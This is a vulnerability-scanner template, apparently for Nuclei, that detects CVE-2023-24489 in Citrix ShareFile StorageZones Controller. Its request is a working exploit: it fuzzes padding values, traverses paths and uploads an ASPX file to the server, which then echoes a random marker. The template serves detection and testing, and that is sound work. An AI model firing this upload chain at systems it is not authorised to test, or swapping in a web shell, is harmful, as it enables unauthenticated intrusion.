59 lines
1.8 KiB
YAML
59 lines
1.8 KiB
YAML
id: CVE-2023-24489
|
|
|
|
info:
|
|
name: Citrix ShareFile StorageZones Controller - Unauthenticated Remote Code Execution
|
|
author: DhiyaneshDK,dwisiswant0
|
|
severity: critical
|
|
description: |
|
|
A vulnerability has been discovered in the customer-managed ShareFile storage zones controller which, if exploited, could allow an unauthenticated attacker to remotely compromise the customer-managed ShareFile storage zones controller.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-24489
|
|
- https://blog.assetnote.io/2023/07/04/citrix-sharefile-rce/
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2023-24489
|
|
cpe: cpe:2.3:a:citrix:sharefile_storagezones_controller:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 256
|
|
shodan-query: title:"ShareFile Storage Server"
|
|
verified: true
|
|
vendor: citrix
|
|
product: sharefile_storagezones_controller
|
|
tags: cve,cve2023,sharefile,rce,intrusive,fileupload,fuzz
|
|
|
|
variables:
|
|
fileName: '{{rand_base(8)}}'
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /documentum/upload.aspx?parentid={{url_encode(padding)}}&raw=1&unzip=on&uploadid={{fileName}}\..\..\..\cifs&filename={{fileName}}.aspx HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
<%@ Page Language="C#" Debug="true" Trace="false" %>
|
|
<script Language="c#" runat="server">
|
|
void Page_Load(object sender, EventArgs e)
|
|
{
|
|
Response.Write("{{randstr}}");
|
|
}
|
|
</script>
|
|
|
|
|
|
payloads:
|
|
padding: helpers/payloads/citrix_paddings.txt
|
|
|
|
threads: 30
|
|
stop-at-first-match: true
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'body == "ERROR: The method or operation is not implemented."'
|
|
- 'status_code == 200'
|
|
condition: and
|
|
|
|
extractors:
|
|
- type: dsl
|
|
dsl:
|
|
- 'BaseURL+ "/cifs/" + fileName + ".aspx"'
|